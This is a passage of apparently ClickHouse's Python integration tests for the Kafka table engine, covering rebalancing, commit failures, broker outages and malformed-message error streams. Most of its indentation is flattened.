kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
    NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
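    # Background producer: batches of 59 messages; msg_index[0] tracks the total number produced.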
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
        # Wait for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
    # Leave the last consumer working on purpose (so it finishes consuming after all the rebalances)
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
    # initialize the PartitionManager earlier (it starts its container)
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # The tricky part here is that the disconnect should happen after the write prefix but before the write suffix.
    # We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, to inject the ZooKeeper failure.
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # Wait for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
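    # Background producer: batches of 113 messages every 0.5 s; i[0] holds the next key to produce
    # (the message with key 1 was already sent above).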
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(300)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # The tricky part here is that the disconnect should happen after the write prefix but before we do the commit.
    # We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, to inject the Kafka broker failure.
kafka_cluster.pause_container('kafka1')
    # If we restore the connection too fast (< 30 sec), librdkafka will not report any timeout
    # (an alternative is to decrease librdkafka's default session timeouts).
    #
    # When the delay is too long (> 50 sec), the broker will decide to remove us from the consumer group
    # and will start answering "Broker: Unknown member".
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
    # After https://github.com/edenhill/librdkafka/issues/2631 the timeout triggers a rebalance, making further
    # commits to the topic after getting back online impossible. So we get a duplicate in that scenario,
    # but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# If we reach the end of a partition, we keep polling until we hit kafka_max_block_size or the flush interval.
# That behavior is a bit questionable - we could instead take bigger pauses between polls to do more work
# in a single pass and give the thread more rest.
# But under spiky load on the Kafka topic the current contract is more predictable and easier to understand,
# so let's keep it as is for now.
# We can also reach EOF because we drained the librdkafka internal queue too fast.
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
    # Messages created here will be consumed immediately after the MV is created,
    # reaching the topic EOF.
    # But we should not flush immediately after reaching EOF, because the
    # next poll can return more data; we should respect kafka_flush_interval_ms
    # and try to form a bigger block.
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # All subscriptions/assignments were done during the SELECT, so the engine starts sending data to test.destination
    # immediately after the MV is created.
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
    # it should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger the issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
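# Illustrative sketch only (not part of the original test suite): the busy-wait
# above polls forever; a bounded variant could look like this. It assumes the
# module-level `instance` object used throughout these tests, and the function
# name and timeout value are arbitrary examples.
def _example_wait_for_rows(query, expected_rows, timeout=180):
    deadline = time.monotonic() + timeout
    while int(instance.query(query)) < expected_rows:
        if time.monotonic() > deadline:
            raise TimeoutError("gave up waiting for {} rows".format(expected_rows))
        time.sleep(1)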
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO a Kafka engine table from an empty SELECT subquery was leading to a failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
@pytest.mark.timeout(180)
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons=10, malformed=0):
s = io.StringIO()
# we don't care at which position the error is added
# (we skip the whole broken message), but we need to be
# sure that at least one error is added,
# otherwise the test will fail.
error_pos = random.randint(0, jsons - 1)
for i in range(jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
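# Illustrative sketch only (not part of the original suite): shows what
# gen_message_with_jsons() above produces, so the row counts asserted in the
# next test are easier to follow. The function name is a hypothetical example.
def _example_message_with_jsons():
    sample = gen_message_with_jsons(jsons=3, malformed=1)
    # three space-separated JSON objects, exactly one of them malformed,
    # e.g. '{"i":1000, "s":"ABC123abc"} {"i":"n1000", "s":"1000"} {"i":1000, "s":"ABC123abc"} '
    assert sample.count('{') == 3
    assert '"n1000"' in sample
    return sample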
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing a broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
@pytest.mark.timeout(120)
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
